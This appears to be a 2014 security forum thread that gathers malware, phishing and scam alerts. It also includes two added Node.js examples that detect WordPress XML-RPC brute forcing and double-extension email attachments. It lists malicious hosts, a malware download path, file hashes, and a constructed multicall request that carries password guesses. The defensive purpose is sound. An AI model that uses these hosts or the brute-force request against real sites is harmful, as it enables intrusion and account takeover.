Aug 20 2014 - "... the original malware known as "Linux.Dnsamp" is a Distributed Denial of Service (DDoS) Trojan, which, according to the company blog*, transfers between Linux machines, altering the startup scripts, collecting and sending machine configuration data to the hackers' server and then running silently waiting for orders. Now it appears that the same hackers have ported the Trojan to run in Windows as "Trojan.Dnsamp.1"**. The Windows version gains entry to the system under the guise of a Windows Service Test called "My Test 1". It is then saved in the system folder of the infected machine under the name "vmware-vmx.exe". When triggered, just like its Linux counterpart, the Trojan sends system information back to the hackers' central server and then awaits the signal to start a DDoS attack or start downloading other malicious programs... Although the threat of malware is an everyday hazard to most computer users, to find an attack on Linux is much rarer, and to find any kind of malware that has been ported from one operating system to another is almost unheard of... Project Shield***, an initiative designed to help smaller web servers fight off DDoS attacks."
* http://news.drweb.com/show/?i=5760&c=23&lng=en&p=1
** http://news.drweb.com/show/?i=5903&lng=en&c=14
*** https://projectshield.withgoogle.com/en/
:mad::mad: :fear:
AplusWebMaster
2014-08-21, 16:30
FYI...
Tech Support SCAMS rip big brand security software with fake warnings
- https://blog.malwarebytes.org/fraud-scam/2014/08/tech-support-scammers-rip-big-brand-security-software-with-fake-warnings/
Aug 21 2014 - "... bogus tech support. If you are looking to download one of the popular antivirus or anti-malware products on the market, watch out before you click.
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/listAVs-965x395.png
Lookalike pages: Fraudsters have set up -fake- download pages that look incredibly like the authentic ones... Hijacked software: Each page links to a download, which of course is -not- the actual software...
> https://blog.malwarebytes.org/wp-content/uploads/2014/07/software.png
The purpose of these fake programs is to trick people into thinking something is wrong with their computers:
> https://blog.malwarebytes.org/wp-content/uploads/2014/07/error.png
The fake pages are hosted here:
hzzzp ://onlineinstanthelp .com/antivirus-download.html
hzzzp ://onlineinstanthelp .com/norton-us/download.html
hzzzp ://onlineinstanthelp .com/mcafee-us/download.html
hzzzp ://onlineinstanthelp .com/avg-us/download.html
hzzzp ://onlineinstanthelp .com/malwarebytes-us/download.html
hzzzp ://onlineinstanthelp .com/winzip-us/download.html
hzzzp ://onlineinstanthelp .com/lavasoft-us/download.html
The company providing ‘support’ is: wefixbrowsers .com ... We are reporting the sites to the registrar and passing on the LogMeIn codes so that interested parties can take appropriate actions. To avoid these -fake- installers, users should always go to the company’s official website..."
(More detail at the malwarebytes URL at the top.)
wefixbrowsers .com / 23.91.123.204: https://www.virustotal.com/en/ip-address/23.91.123.204/information/
onlineinstanthelp .com / 118.139.186.35: https://www.virustotal.com/en/ip-address/118.139.186.35/information/
___
Fake HMRC SPAM - malware
- http://myonlinesecurity.co.uk/helping-business-onile-malware/
21 Aug 2014 - "'Helping your Business onile' pretending to come from 'HMRC Business Help and Education Emails' is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email looks like:
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/08/Helping-your-Business-onile.png
21 August 2014 Credit_file_961529461.zip ( 50 kb)... Current Virus total detections: 1/51*
... targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day. Be very careful when unzipping them and make sure you have “show known file extensions enabled“, And then look carefully at the unzipped file. If it says .EXE then it is a problem and should -not- be run or opened..."
* https://www.virustotal.com/en/file/050eae9a0470d35275c74159872ddf4232430ec6890b3d411769e2622c0183f8/analysis/1408620337/
___
Fake Credit reference SPAM - word Doc malware
- http://myonlinesecurity.co.uk/re-credit-reference-file-request-108278994-fake-word-doc-malware/
21 Aug 2014 - "'RE: Credit reference file request.(108278994)' is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
Dear <REDACTED>
You have obtain a copy of your credit reference file.
We’re happy to help you with any questions or concerns you may have. Please contact us directly 24/7 .
Lynn Buck.
21 August 2014: Credit_file_108278994.zip (52 kb): Extracts to Credit reference file.doc.scr
Current Virus total detections: 2/52*
21 August 2014: Credit_file_642094175.zip (85kb): Extracts to credit_reference_file.xls.scr
Current Virus total detections: 2/52*
This 'RE: Credit reference file request.(108278994)' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper word file instead of the .scr executable file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/4326821ac04b6e7d4c36093065b01e7d2ea6931818532c01a5988d2782110aaf/analysis/1408613742/
___
JPMorgan customers targeted in phishing campaign
- http://www.reuters.com/article/2014/08/21/us-cybercrime-jpmorgan-spam-idUSKBN0GL20R20140821
Aug 21, 2014 - "Fraudsters are targeting JPMorgan Chase & Co customers in an email "phishing" campaign that is unusual because it attempts to collect credentials for that bank and also infect PCs with a virus for stealing passwords from -other- institutions. The campaign, dubbed "Smash and Grab," was launched on Tuesday with a widely distributed email that urged recipients to click to view a secure message from JPMorgan, according to security researchers with corporate email provider Proofpoint Inc. JPMorgan, the No. 1 U.S. bank by assets, confirmed that spammers had launched a phishing campaign targeting its customers... the bank believes most of the spam was stopped by fraud filters at large Internet providers, adding that the email looked realistic because the attackers apparently used a screen grab from an authentic email sent by the bank. Users who click on a malicious link are asked to enter credentials for accessing accounts with JPMorgan. Even if they did not comply, the site attempted to automatically install the Dyre banking Trojan* on their PCs, according to Proofpoint. Dyre is a recently discovered piece of malware that seeks credentials from customers of Bank of America Corp, Citigroup Inc and the Royal Bank of Scotland Group PLC, according to email security firm Phishme."
* http://blog.malcovery.com/blog/dyre-banking-trojan-what-you-need-to-know
> https://www.brainyquote.com/quotes/quotes/b/benjaminfr122731.html
"Distrust and caution are the parents of security" - Ben Franklin
:mad: :fear::fear:
AplusWebMaster
2014-08-22, 15:49
FYI...
WordPress attacks exploiting XMLRPC
- http://myonlinesecurity.co.uk/ongoing-wordpress-attacks-exploiting-xmlrpc/
Aug 22, 2014 - "We are experiencing Ongoing WordPress attacks exploiting XMLRPC. There appears to be a massive attack on WordPress sites today. So far I have had almost -1600- blocked attacks against ONE of my WordPress sites... Anybody using WordPress should make sure that they are plugged and use a good security system to prevent or -block- these attacks. It appears to be using the attack mentioned in this post:
> http://blog.sucuri.net/2014/07/new-brute-force-attacks-exploiting-xmlrpc-in-wordpress.html
... -None- of the current wordpress security plugins will -block- this and you need to make sure that you have a strong random password on your admin account. The -only- way to block them is on the perimeter, that is use a firewall that blocks the offending IP numbers that are responsible for the attacks. They are all coming from other compromised servers or hacked users computers..."
(More detail at the URL's above.)
___
Fake ADP 'Anti-Fraud Secure Update' SPAM – PDF malware
- http://myonlinesecurity.co.uk/adp-august-22-2014-anti-fraud-secure-update-fake-pdf-malware/
22 Aug 2014 - "'ADP: August 22, 2014 Anti-Fraud Secure Update' pretending to come from ADP_Netsecure@ adp .com is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email looks like:
Dear Valued ADP Client,
We are pleased to announce that ADP Payroll System released secure upgrades to your computer.
A new version of secure update is available.
Our development division strongly recommends you to download this software update.
It contains new features:
The certificate will be attached to the computer of the account holder, which disables any fraud activity
Any irregular activity on your account is detected by our safety centre
Download the attachment. Update will be automatically installed by double click.
We value our partnership with you and take pride in the confidence that you place in us to process payroll on your behalf. As always, your ADP Service Team is happy to assist with any questions you may have...
22 August 2014 : 2014 Anti-Fraud Secure Update_08222014.zip (9kb)
Extracts to 2014 Anti-Fraud Secure Update_08222014.exe
Current Virus total detections: 3/54* . This 'ADP: August 22, 2014 Anti-Fraud Secure Update' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/81e695f628436a4850bec46b3f90906433a0d11ae163f298f48fae788362d29a/analysis/1408710186/
- http://threattrack.tumblr.com/post/95457720908/adp-anti-fraud-update-spam
22 Aug 2014 - "Subjects Seen:
ADP: August 22, 2014 Anti-Fraud Secure Update
Typical e-mail details:
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/0ce8b26a9ef99d5ebbb8f37a1f29e47d/tumblr_inline_napm4cGa8i1r6pupn.png
Malicious File Name and MD5:
2014 Anti-Fraud Secure Update_08222014.scr (840B3B6A714F7330706F0C19F99D5EB8)
2014 Anti-Fraud Secure Update_08222014.zip (AB0D93E0952BDCE45D6E6494DF4D94AD)
Tagged: ADP, Upatre
___
"FlashPack" - add-on targets Japanese users, leads To exploit kit
- http://blog.trendmicro.com/trendlabs-security-intelligence/website-add-on-targets-japanese-users-leads-to-exploit-kit/
Aug 21, 2014 - "... In order to affect users, this particular exploit kit does -not- rely on spammed messages or compromised websites: instead, it uses a compromised website add-on. This particular add-on is used by site owners who want to add social media sharing buttons on their sites. All the site owner would have to do is add several lines of JavaScript code to their site’s design template. This code is freely available from the website of the add-on. The added script adds an overlay like this to the site’s pages:
Added share buttons:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/08/toolbar.png
To do this, a JavaScript file on the home page of the add-on is loaded. This alone should raise red flags: it means that the site owner is loading scripts from an external server -not- under their control. It’s one thing if it loads scripts on trusted sites like Google, Facebook, or other well-known names; it’s another thing to load scripts on little-known servers with no name to protect. As it turns out, this script is being used for malicious purposes. On certain sites, instead of the original add-on script, the user is redirected to the script of FlashPack... loading the s.js file directly will simply load the “correct” script for the add-on. One site which, if found in the Referer header, will trigger the exploit kit is a well-known free blogging site in Japan. The exploit kit delivers various Flash -exploits- to -targeted- users... At least approximately 58,000 users have been affected by this attack, with more than 87% of these coming from Japan. The landing pages of the exploit kit are hosted in servers in the Czech Republic, the Netherlands, and Russia.
Number of hits by country from August 1 to 17
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/08/Number-of-Hits-by-Country-01.jpg
How can users and site owners prevent these attacks? Site owners should be very cautious about adding add-ons to their site that rely on externally hosted scripts. As shown in this attack, they are trivial to use in malicious activities. In addition, they can slow the site down as well. Alternatives that host the script on the same server as the site itself are preferable. This incident illustrates for end users the importance of keeping-software-patched. The vulnerability we mentioned above has been fixed for half-a-year. Various auto-update mechanisms exist which can keep Flash up-to-date..."
:fear::fear: :mad:
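Added example, not code from the myonlinesecurity post or from Sucuri: two Node.js checks for the XML-RPC brute-force traffic described in the WordPress item above. The first pulls POSTs to xmlrpc.php out of Apache combined-format access logs and counts them per client IP, which yields the perimeter block list the post says is the only thing that works. The second inspects a single request body for the system.multicall wrapper that the linked Sucuri write-up describes, where one HTTP request carries many wp.getUsersBlogs calls, each with a username and password to try. The log lines, request bodies, addresses and threshold below are constructed for the example.

```javascript
// Added example: spot XML-RPC brute forcing from access logs and request bodies.
// Constructed Apache "combined" log lines (RFC 5737 / TEST-NET addresses).
const SAMPLE_LOG = [
  '203.0.113.7 - - [22/Aug/2014:09:01:11 +0100] "POST /xmlrpc.php HTTP/1.1" 200 612 "-" "Mozilla/4.0"',
  '203.0.113.7 - - [22/Aug/2014:09:01:12 +0100] "POST /xmlrpc.php HTTP/1.1" 200 612 "-" "Mozilla/4.0"',
  '203.0.113.7 - - [22/Aug/2014:09:01:13 +0100] "POST /xmlrpc.php HTTP/1.1" 200 612 "-" "Mozilla/4.0"',
  '198.51.100.20 - - [22/Aug/2014:09:02:00 +0100] "GET /2014/08/some-post/ HTTP/1.1" 200 8841 "-" "Mozilla/5.0"',
  '198.51.100.20 - - [22/Aug/2014:09:02:05 +0100] "POST /xmlrpc.php HTTP/1.1" 200 412 "-" "Jetpack by WordPress.com"',
  '192.0.2.55 - - [22/Aug/2014:09:03:41 +0100] "POST /xmlrpc.php HTTP/1.0" 200 612 "-" "-"',
  '192.0.2.55 - - [22/Aug/2014:09:03:42 +0100] "POST /xmlrpc.php HTTP/1.0" 200 612 "-" "-"',
];

// ip, ident, user, [timestamp], "METHOD PATH PROTO", status, ...
const LOG_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})/;

// Count POSTs to xmlrpc.php per client IP and return the IPs at or above
// `threshold`, highest first: a candidate perimeter (firewall) block list.
function xmlrpcPosters(lines, threshold) {
  const counts = new Map();
  for (const line of lines) {
    const m = LOG_RE.exec(line);
    if (!m) continue; // not a combined-format line
    const [, ip, , method, path] = m;
    if (method !== 'POST' || !path.split('?')[0].endsWith('/xmlrpc.php')) continue;
    counts.set(ip, (counts.get(ip) || 0) + 1);
  }
  return [...counts.entries()]
    .filter(([, n]) => n >= threshold)
    .sort((a, b) => b[1] - a[1])
    .map(([ip, n]) => ({ ip, posts: n }));
}

// Constructed request bodies: a multicall carrying two credential guesses,
// and an ordinary single wp.getUsersBlogs call as a legitimate client sends it.
const SAMPLE_MULTICALL = `<?xml version="1.0"?>
<methodCall><methodName>system.multicall</methodName><params><param><value><array><data>
<value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member>
<member><name>params</name><value><array><data><value><string>admin</string></value><value><string>password1</string></value></data></array></value></member></struct></value>
<value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member>
<member><name>params</name><value><array><data><value><string>admin</string></value><value><string>letmein</string></value></data></array></value></member></struct></value>
</data></array></value></param></params></methodCall>`;
const SAMPLE_SINGLE = `<?xml version="1.0"?><methodCall><methodName>wp.getUsersBlogs</methodName>
<params><param><value><string>admin</string></value></param><param><value><string>x</string></value></param></params></methodCall>`;

// Inspect one XML-RPC body. The outer method is a <methodName> tag; inside a
// system.multicall the nested method names are <string> values of a
// "methodName" struct member, so they are collected separately.
function inspectXmlrpcBody(xml, maxAuthCalls = 1) {
  const top = /<methodName>\s*([\w.]+)\s*<\/methodName>/.exec(xml);
  const method = top ? top[1] : null;
  const nestedRe = /<name>\s*methodName\s*<\/name>\s*<value>\s*<string>\s*([\w.]+)\s*<\/string>/g;
  const nested = [];
  let m;
  while ((m = nestedRe.exec(xml)) !== null) nested.push(m[1]);
  // Every wp.* method takes a username/password pair, so each one is a guess.
  const authCalls = method === 'system.multicall'
    ? nested.filter((n) => n.startsWith('wp.')).length
    : method && method.startsWith('wp.') ? 1 : 0;
  return {
    method,
    nested,
    authCalls,
    suspicious: method === 'system.multicall' && authCalls > maxAuthCalls,
  };
}
```

The threshold matters: Jetpack, mobile apps and pingbacks all legitimately POST to xmlrpc.php, so a single request from an address is not evidence of anything, whereas a burst from one address, or one body carrying many wp.* calls, is. A web application firewall that sees request bodies can reject the multicall shape directly; a plain access-log feed can only produce the per-IP list for the perimeter.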
AplusWebMaster
2014-08-24, 13:17
FYI...
My Photos SPAM - malware
- http://myonlinesecurity.co.uk/photos-malware/
23 Aug 2014 - "'My Photos' is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Very simple email with content just saying 'Please find attached photos of my birthday party.' This one is particularly nasty and dangerous because it doesn’t give any outward signs of infection. It downloads an auto-configure script from http ://construtoralondres.zip .net/JScript32.log which then attempts to send all traffic through a proxy server http ://supermercadorleves.ddns .net which then filters out UK banking traffic to another proxy where they can steal all your banking log on and account information. Each UK bank is sent to a -different- proxy where the sites are set up to intercept traffic to the genuine UK bank site. That way, you think that you are on the genuine UK bank site and you actually are, but the proxy between you and the bank can read -everything- you type or do on the bank site. You have absolutely no idea that this is happening & you still get a padlock in the address bar to say that you are on a safe site.
23 August 2014: My Photos.zip ( 8kb): Extracts to My Photos.exe
Current Virus total detections: 10/50* . All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email. Whether it is a message saying “look at this picture of me I took last night” and it appears to come from a friend or is more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day. Be very careful when unzipping them and make sure you have “show known file extensions enabled“, and then look carefully at the unzipped file. If it says .EXE then it is a problem and should -not- be run or opened."
* https://www.virustotal.com/en/file/8ef000f729f060a55aabaae7f16dc0e4da1108cdb8fef189dbafaa5b220b5ff0/analysis/1408799346/
zip .net / 200.147.99.195: https://www.virustotal.com/en/ip-address/200.147.99.195/information/
- http://quttera.com/detailed_report/zip.net
Submission date: Aug 24 16:53:51 2014
Server IP address: 200.147.99.195
"Warning: This Website Is Blacklisted!..."
ddns .net / 8.23.224.108: https://www.virustotal.com/en/ip-address/8.23.224.108/information/
- http://quttera.com/detailed_report/ddns.net
Submission date: Aug 24 16:46:40 2014
Server IP address: 8.23.224.108
"Alert: Suspicious Content Detected On This Website!..."
___
Sony PlayStation Network taken down by attack
- http://www.reuters.com/article/2014/08/25/us-sony-network-idUSKBN0GP02620140825
Aug 24, 2014 - "Sony Corp said on Sunday its PlayStation Network was taken down by a denial of service-style attack and the FBI was investigating the diversion of a flight carrying a top Sony executive amid reports of a claim that explosives were on board. The company said in a posting on its PlayStation blog that no personal information of the network was accessed in the attack, which overwhelmed the system with heavy traffic..."
- http://www.reuters.com/article/2014/08/25/us-sony-network-idUSKBN0GP02620140825
Aug 25, 2014 - "Sony Corp's PlayStation Network was back online on Monday following a cyber attack that took it down over the weekend, which coincided with a bomb scare on a commercial flight carrying a top Sony executive in the United States. Sony said on its PlayStation blog that its PlayStation network had been taken down by a denial of service-style attack, which overwhelmed the system with traffic, but did not intrude onto the network or access any of its 53 million users' information..."
:mad: :fear: :sad:
AplusWebMaster
2014-08-25, 14:51
FYI...
Fake Invoice SPAM - PDF Malware
- http://myonlinesecurity.co.uk/please-find-attached-invoice-fake-pdf-malware/
25 Aug 2014 - "'Please find attached Invoice No.' < random number> pretending to come from portadown.372@eel .co.uk is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... These emails are -not- being sent from eel .co.uk or edmundson-electrical .co.uk, As far as we can determine they have not been hacked or their website or email system compromised. The bad guys have just decided to use Edmundson Electrical Ltd as a way to persuade you to open the attachment and become infected. It is a follow on campaign from this Broadoak toiletries attack:
> http://myonlinesecurity.co.uk/invoice-951266-fake-pdf-malware/
Once again this email template has several different sized malwares attached to it and it appears random which version you get... Email looks like:
WALSALL
MAHON RD IND EST. PORTADOWN
CO. ARMAGH BT62 3EH
T:028 3833 5316
F:028 3833 8453
Please find attached Invoice No. 3036 – 8340637
Best
Branch Manager
Registered Office: PO Box 1 Knutsford Cheshire WA16 6AY ...
25 August 2014: 3036 – 8340637.zip (44kb): Extracts to Invoice 372 – 667911.exe
Current Virus total detections: 2/55*
25 August 2014: 0463 – 485325.zip (47kb): Extracts to Invoice 829 – 991882.exe
Current Virus total detections: 2/51**
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/e9b4e4ffb3943a08bc1c7b7bc7548aa5ce6e53375514081caf8d8973eadf5c87/analysis/1408955315/
** https://www.virustotal.com/en/file/cbd0a0fe8caa5e02e05ae196b89d3d1d1f6f680b00403add549b12356e2d8013/analysis/1408955404/
___
Fake Fax SPAM - pdf malware
- http://myonlinesecurity.co.uk/fax-arrived-remote-id-866-905-0884-fake-pdf-malware/
25 Aug 2014 - "'A fax has arrived from remote ID ’866-905-0884' pretending to come from RFaxSMTP MTGm <RIGHTFAX@ mtgmfaxmail .bankofamerica .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email looks like:
A fax has arrived from remote ID ’866-905-0884′.
————————————————————
Transmission Record
Received from remote ID: ’866-905-0884′
Inbound user ID derek, routing code 669164574
Result: (0/352;0/0) Successful Send
Page record: 1 – 2
Elapsed time: 00:39 on channel 34 ...
25 August 2014: Fax_Remote_ID.zip ( 13kb) : Extracts to Fax_Remote_ID.scr
Current Virus total detections: 0/55* . This 'A fax has arrived from remote ID 866-905-0884' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/37bbf261819afd6fabb75cb8815d4651e09329ab5cb8fe0b01d376096f195ab6/analysis/1408971894/
___
Bank of America Activity Alert Spam
- http://threattrack.tumblr.com/post/95740068388/bank-of-america-activity-alert-spam
Aug 25, 2014 - "Subjects Seen:
Bank of America Alert: A Check Exceeded Your Requested Alert Limit
Typical e-mail details:
Activity Alert
A check exceeded your requested alert limit
We’re letting you know a check written from your account went over the limit you set for this alert.
For more details please check attached file
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/4bf4d24ed5d86a6ec8c689e611edac36/tumblr_inline_navd12Tu861r6pupn.png
Malicious File Name and MD5:
report08252014_6897454147412.vcr (7ED898AA2A8B247F7C7A46D71B125EA8)
report08252014_6897454147412.zip (FF4C74D80D3C7125962D7316F570A7FF)
Tagged: Bank of America, Upatre
___
Facebook Work From Home SCAM
- http://www.hoax-slayer.com/facebook-work-from-home-program-scam.shtml
Aug 25, 2014 - "Message claims that Facebook has launched a new 'Work From Home' program that will allow users to make money from the comfort of their own homes... The message is a scam. Facebook has not launched such a program and has no connection to the scheme. The link in the message takes you to a fake Facebook Page that tries to trick you into paying four dollars for a dodgy 'Facebook Millionaire' kit. Fine print on the signup form indicates that your credit card will be charged $94 per month for continued access. Do -not- be tempted to participate in this -bogus- program.
> http://www.hoax-slayer.com/images/facebook-work-from-home-program-scam-1.jpg
... It claims that people can potentially make thousands of dollars per month but warns that only a limited number of 'positions' are available... If this message comes your way, do -not- click any links it contains..."
___
Fake ADP SPAM - PDF malware
- http://myonlinesecurity.co.uk/adp-invoice-week-ending-08222014-invoice-447589545-fake-pdf-malware/
25 Aug 2014 - "'ADP Invoice for week ending 08/22/2014 Invoice: 447589545' pretending to come from Billing.Address.Updates@ ADP .com is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
Your most recent ADP invoice is attached for your review. If you have any questions regarding this invoice, please contact your ADP service team at the number or e-mail address provided on the invoice for assistance.
Thank you for choosing ADP for your business solutions.
Important: Please do not respond to this message. It is generated from an unattended mailbox.
25 August 2014: invoice_447589545.zip (10kb): Extracts to invoice_447589545.exe
Current Virus total detections: 2/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/511aae72f63fd0256b7210d8a20afc75df7d1225ac054ec732a7fee43d11657b/analysis/1408992097/
___
BoA Merrill Lynch CashPro Spam
- http://threattrack.tumblr.com/post/95756978548/bank-of-america-merrill-lynch-cashpro-spam
Aug 25, 2014 - "Subjects Seen:
Bank of America Merrill Lynch: Completion of request for ACH CashPro
Typical e-mail details:
You have received a secure message from Bank of America Merrill Lynch
Read your secure message by opening the attachment, securedoc.html. You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it in a Web browser.
If you have concerns about the validity of this message, contact the sender directly.
First time users - will need to register after opening the attachment.
Malicious URLs:
161.58.101.183/handler/jxpiinstall.exe
Malicious File Name and MD5:
securedoc.html (D6E1DD6973F8FAA730941A19770C97F2)
jxpiinstall.exe (C3110BFDD8536DC627336D7F7A6CC2E7)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/f63cc48713e65cd81bd3d292795f917a/tumblr_inline_navorjRagN1r6pupn.png
Tagged: Bank of America, Merrill Lynch, tuscas
161.58.101.183: https://www.virustotal.com/en/ip-address/161.58.101.183/information/
:mad: :fear: :sad:
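Added example, not code from myonlinesecurity or ThreatTrack: a Node.js triage of attachment names for the "spoofed icon" double-extension trick the posts above keep describing (Credit reference file.doc.scr, credit_reference_file.xls.scr, Fax_Remote_ID.scr, the .exe files with PDF icons inside small ZIPs). It does at the mail gateway what "show known file extensions" does on the desktop: judge the file by its real last extension, including for members of an archive. The attachment list and ZIP contents are constructed from the names quoted in the posts; the extension lists are this example's own choice.

```javascript
// Added example: flag executables hiding behind document-looking names.
const EXECUTABLE_EXTS = new Set([
  'exe', 'scr', 'com', 'pif', 'bat', 'cmd', 'vbs', 'vbe', 'js', 'jse',
  'wsf', 'wsh', 'ps1', 'msi', 'hta', 'cpl', 'lnk', 'jar',
]);
const DOCUMENT_EXTS = new Set([
  'pdf', 'doc', 'docx', 'xls', 'xlsx', 'ppt', 'pptx', 'rtf', 'txt',
  'jpg', 'jpeg', 'png', 'gif',
]);
const ARCHIVE_EXTS = new Set(['zip', 'rar', '7z', 'gz', 'tgz', 'tar']);

// Classify one file name: 'block' for executables (including ones wearing a
// document extension), 'review' for archives and HTML, 'allow' otherwise.
function classifyName(name) {
  // Windows drops trailing dots and spaces when creating a file and treats the
  // last remaining extension as the real one, so normalise the same way.
  const clean = name.trim().replace(/[.\s]+$/, '').toLowerCase();
  const parts = clean.split('.');
  if (parts.length < 2) return { name, verdict: 'review', reason: 'no extension' };
  const realExt = parts[parts.length - 1];
  const innerExt = parts.length > 2 ? parts[parts.length - 2] : null;
  if (EXECUTABLE_EXTS.has(realExt)) {
    const reason = innerExt && DOCUMENT_EXTS.has(innerExt)
      ? `.${innerExt} disguise on an executable .${realExt}`
      : `executable .${realExt}`;
    return { name, verdict: 'block', reason };
  }
  if (ARCHIVE_EXTS.has(realExt)) return { name, verdict: 'review', reason: 'archive: inspect members' };
  if (realExt === 'html' || realExt === 'htm') {
    return { name, verdict: 'review', reason: 'HTML attachment can redirect or run script' };
  }
  return { name, verdict: 'allow', reason: `.${realExt} is not executable` };
}

// Triage one message: the top-level attachments plus the member names of any
// archive among them. `archives` maps an archive's name to its member names
// (obtained from listing the ZIP, not from the name alone).
function triageMessage(attachments, archives) {
  const findings = [];
  for (const att of attachments) {
    findings.push(classifyName(att));
    for (const member of archives[att] || []) {
      findings.push({ ...classifyName(member), name: `${att} -> ${member}` });
    }
  }
  const verdict = findings.some((f) => f.verdict === 'block') ? 'block'
    : findings.some((f) => f.verdict === 'review') ? 'review' : 'allow';
  return { verdict, findings };
}

// Constructed sample built from attachment names quoted in the posts above.
const SAMPLE_ATTACHMENTS = ['Credit_file_108278994.zip', 'Fax_Remote_ID.zip', 'statement.pdf'];
const SAMPLE_ARCHIVES = {
  'Credit_file_108278994.zip': ['Credit reference file.doc.scr'],
  'Fax_Remote_ID.zip': ['Fax_Remote_ID.scr'],
};
```

The name check is a first filter, not a substitute for content inspection: a .scr is a PE executable whatever it is called, so the same rule applied to the file's magic bytes (MZ header) catches renamed payloads the name alone would miss.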
AplusWebMaster
2014-08-26, 12:21
FYI...
Fake Vodafone SPAM
- http://blog.dynamoo.com/2014/08/vodafone-mms-service-malware-spam.html
26 Aug 2014 - "This -fake- Vodafone spam comes with a malicious attachment. There is no body text as such, the header reads:
From: Vodafone MMS service [mms813562@ vodafone .co.uk]
Date: 26 August 2014 12:00
Subject: IMG Id 813562-PictQbmR TYPE--MMS
The version I had was mangled and the attachment was just called noname which required a bit of work to turn into a ZIP file IMG Id 813562-PicYbgRr TYPE--MMS.zip which in turn contains a malicious executable Picture Id 550125-PicSfdce TYPE-MMS.exe. This .EXE file has a VirusTotal detection rate of 3/55*. The malware then attempts to download additional components... This second component has a VirusTotal detection rate of 3/53**... I would recommend the following blocklist:
192.254.186.106 ..."
(More detail at the dynamoo URL above.)
* https://www.virustotal.com/en-gb/file/fe088d41e44b4c63ea6c4ed572f4537dc19265bddc56a567b61587b35819511d/analysis/1409051519/
** https://www.virustotal.com/en-gb/file/8aa74dba2e258b6965c8e3e68480ac5912f52fd85dc6c96839cce0c23123e776/analysis/1409052175/
192.254.186.106: https://www.virustotal.com/en/ip-address/192.254.186.106/information/
___
Phishers hook Facebook Users via SMS
- https://blog.malwarebytes.org/fraud-scam/2014/08/phishers-hook-facebook-users-via-sms/
Aug 26, 2014 - "If you happen to receive an SMS message from a potentially unknown recipient with the following text—
wtf f***** remove this pic from Facebook. http ://bit[dot]do/fbnudephotos
... much like the fellow on the screenshot:
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/SMS.png
...then you’ve been targeted by a phishing campaign. The bit .do link is the shortened URL for a publicly available HTML page hosted on a Dropbox account. It looks like this:
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/dbox-phish.png
All links but one – the 'Get Facebook for iPhone and browse faster' link – lead to a 404 page. The aforementioned link leads to the actual iTunes app download page. The full code of the page is actually hex encoded and executed by the unescape () function... Once users provide their Facebook credentials to the page, these are then posted to a .PHP page hosted on 193[dot]107[dot]17[dot]68, which we found out to be quite a popular location for hosting malware. While this happens in the background, users are directed to the following screenshot which serves as humour, if not a “Gotcha!” after a successful con:
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/unibrow.png
... Individuals or groups with bad intent have been using SMS as a way to -scam- people, either for their money or for their information. Senior Security Researcher Jérôme Segura has published a post entitled “SMS Scams: How To Defend Yourself”* back in 2013, which I recommend you... read as well. His thoughts on this kind of fraud remain relevant to this date..."
* https://blog.malwarebytes.org/intelligence/2013/07/sms-scams-how-to-defend-yourself/
193.107.17.68: https://www.virustotal.com/en/ip-address/193.107.17.68/information/
___
Vacation SCAMS ...
- https://blog.malwarebytes.org/fraud-scam/2014/08/leave-these-vacation-scams-at-the-border/
Aug 26, 2014 - "... common travel scams and things to be wary of right now... First up, we have an Infographic over at the Just the flight blog which details 40 tourist scams to avoid*, along with common locations for said scams:
* http://www.justtheflight.co.uk/blog/16-40-tourist-scams-to-avoid-this-summer.html
... Whether you’re being driven to fake hotels by taxi drivers in on the act, looking at bogus takeaway menus slipped under your hotel door, accosted by pretend policemen or trying to catch a fake baby (no really) thrown in your general direction by a scammer working with pickpockets... Next up, we have some advice on the South China Morning Post in relation to travelling alone**, which includes tips and advice alongside links to additional information. Well worth a look if you’re planning on upping sticks and going solo:
